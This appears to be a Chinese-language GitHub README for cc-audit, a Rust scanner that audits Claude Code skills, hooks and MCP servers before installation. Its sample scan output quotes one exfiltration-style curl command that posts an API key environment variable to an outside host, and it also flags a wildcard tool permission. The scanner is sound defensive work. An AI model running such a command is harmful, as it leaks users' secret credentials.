ryo-ebata/cc-audit
GitHub: ryo-ebata/cc-audit
一款针对 Claude Code 生态的 AI 静态安全扫描器,专注预安装阶段的风险识别与合规治理。
Stars: 18 | Forks: 1
# cc-audit
[](https://crates.io/crates/cc-audit)
[](https://crates.io/crates/cc-audit)
[](https://www.npmjs.com/package/@cc-audit/cc-audit)
[](https://www.npmjs.com/package/@cc-audit/cc-audit)
[](https://github.com/ryo-ebata/homebrew-tap)
[](https://github.com/ryo-ebata/cc-audit)
[](https://opensource.org/licenses/MIT)
[](https://github.com/ryo-ebata/cc-audit/actions)
[](https://codecov.io/gh/ryo-ebata/cc-audit)
[](https://docs.rs/cc-audit)
[](https://blog.rust-lang.org/)
[](https://doc.rust-lang.org/edition-guide/)
**用于 Claude Code 技能、钩子和 MCP 服务器的安全审计器。**
在安装前扫描第三方 Claude Code 工件中的安全漏洞。
[日本語ドキュメント](./docs/README.ja.md)
## 为什么使用 cc-audit?
Claude Code 生态系统正在快速增长,数以千计的技能、钩子和 MCP 服务器分布在 [awesome-claude-code](https://github.com/hesreallyhim/awesome-claude-code) 等市场中。
但这造成了显著的安全缺口。用户必须在未经验证的情况下信任第三方工件,使自己面临以下风险:
- **数据外泄** — API 密钥、SSH 密钥和敏感信息被发送到外部服务器
- **权限提升** — 未经授权的 sudo 访问、文件系统破坏
- **持久化** — crontab 操纵、SSH authorized_keys 修改
- **提示注入** — 隐藏指令劫持 Claude 的行为
- **过度授权** — 通配符工具访问权限(`allowed-tools: *`)
**cc-audit** 通过在安装前扫描工件来填补这一缺口。
## 安装
### Homebrew(macOS/Linux)
```
brew install ryo-ebata/tap/cc-audit
```
### Cargo(Rust)
```
cargo install cc-audit
```
### npm(Node.js)
```
# 直接运行
npx @cc-audit/cc-audit check ./my-skill/
# 或全局安装
npm install -g @cc-audit/cc-audit
cc-audit check ./my-skill/
```
### 从源码构建
```
git clone https://github.com/ryo-ebata/cc-audit.git
cd cc-audit && cargo install --path .
```
### 直接下载
从 [GitHub Releases](https://github.com/ryo-ebata/cc-audit/releases) 下载二进制文件。
## 快速开始
```
# 生成配置文件
cc-audit init
# 扫描技能目录
cc-audit check ./my-skill/
# 扫描并输出 JSON/HTML
cc-audit check ./skill/ --format json --output results.json
cc-audit check ./skill/ --format html --output report.html
# 严格模式(包含中/低严重性)
cc-audit check ./skill/ --strict
# 扫描不同工件类型
cc-audit check --type mcp ~/.claude/mcp.json
cc-audit check --type docker ./
cc-audit check --type dependency ./
# 开发环境的监听模式
cc-audit check --watch ./my-skill/
# 扫描所有已安装的 AI 编码客户端
cc-audit check --all-clients
# 扫描指定客户端
cc-audit check --client cursor
cc-audit check --client claude
# 安装 pre-commit 钩子
cc-audit hook init
```
## 示例输出
```
Scanning: ./awesome-skill/
scripts/setup.sh:42:1: [ERROR] [CRITICAL] EX-001: Network request with environment variable
|
42 | curl -X POST https://api.example.com -d "key=$ANTHROPIC_API_KEY"
| ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
= why: Potential data exfiltration: network request with environment variable detected
= ref: CWE-200, CWE-319
= fix: Remove or encrypt sensitive data before transmission
SKILL.md:3:1: [ERROR] [HIGH] OP-001: Wildcard tool permission
|
3 | allowed-tools: *
| ^^^^^^^^^^^^^^^^
= why: Overly permissive tool access detected
= ref: CWE-250
= fix: Specify explicit tool permissions instead of wildcard
━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━━
Risk Score: 60/100 [██████░░░░] HIGH
Summary: 2 errors, 0 warnings (1 critical, 1 high, 0 medium, 0 low)
Result: FAIL (exit code 1)
```
## 命令
| 命令 | 描述 |
| --- | --- |
| `check` | 扫描路径中的安全漏洞 |
| `init` | 生成默认配置文件 |
| `hook` | 管理 Git 预提交钩子 |
| `serve` | 作为 MCP 服务器运行 |
| `proxy` | 作为 MCP 代理进行运行时监控 |
## 文档
| 文档 | 描述 |
| --- | --- |
| [CLI 参考](./docs/CLI.md) | 所有命令行选项 |
| [MCP 集成](./docs/MCP.md) | 使用 cc-audit 作为 MCP 服务器与 Claude Code 配合 |
| [配置](./docs/CONFIGURATION.md) | 配置文件、自定义规则、恶意软件签名 |
| [检测规则](./docs/RULES.md) | 所有检测规则及其严重级别 |
| [高级功能](./docs/FEATURES.md) | 基线/漂移检测、自动修复、监控模式 |
| [CI/CD 集成](./docs/INTEGRATION.md) | GitHub Actions、GitLab CI、故障排除 |
## 主要特性
- **100+ 检测规则** — 数据外泄、权限提升、持久化、提示注入等
- **多种扫描类型** — 技能、钩子、MCP 服务器、命令、Docker、依赖项、子代理、插件
- **多客户端支持** — 自动检测并扫描 Claude、Cursor、Windsurf、VS Code 配置
- **远程仓库扫描** — 直接扫描 GitHub 仓库,包括 awesome-claude-code 生态系统
- **CVE 漏洞扫描** — 内置 AI 编码工具已知漏洞数据库
- **风险评分** — 0-100 分及分类明细
- **基线/漂移检测** — 防止地毯式拔草攻击
- **MCP 固定** — 固定工具配置以检测未经授权的更改
- **自动修复** — 自动修复某些问题
- **多种输出格式** — 终端、JSON、SARIF、HTML、Markdown
- **安全标识** — 为项目生成 shields.io 标识
- **SBOM 生成** — CycloneDX 格式支持
- **代理模式** — 运行时 MCP 监控与透明代理
- **监控模式** — 开发过程中实时扫描
- **CI/CD 就绪** — GitHub Security 集成的 SARIF 输出
## 相关项目
- [Claude Code](https://code.claude.com/) — Anthropic 的官方 CLI 工具
- [模型上下文协议](https://modelcontextprotocol.io/) — MCP 规范
## 安全
如果发现安全漏洞,请通过 [GitHub Security Advisories](https://github.com/ryo-ebata/cc-audit/security) 报告。
## 许可证
[MIT](LICENSE)
**安装前请先扫描。**
标签:AI安全, Artifact安全, Chat Copilot, Claude Code, Hook安全, MCP配置安全, Rust, 代码签名, 包扫描, 可视化界面, 可重现扫描, 开发者安全, 技能安全, 提示注入, 数据泄露防护, 服务器监控, 确定性安全, 网络探测, 网络流量审计, 通知系统, 集群管理, 静态扫描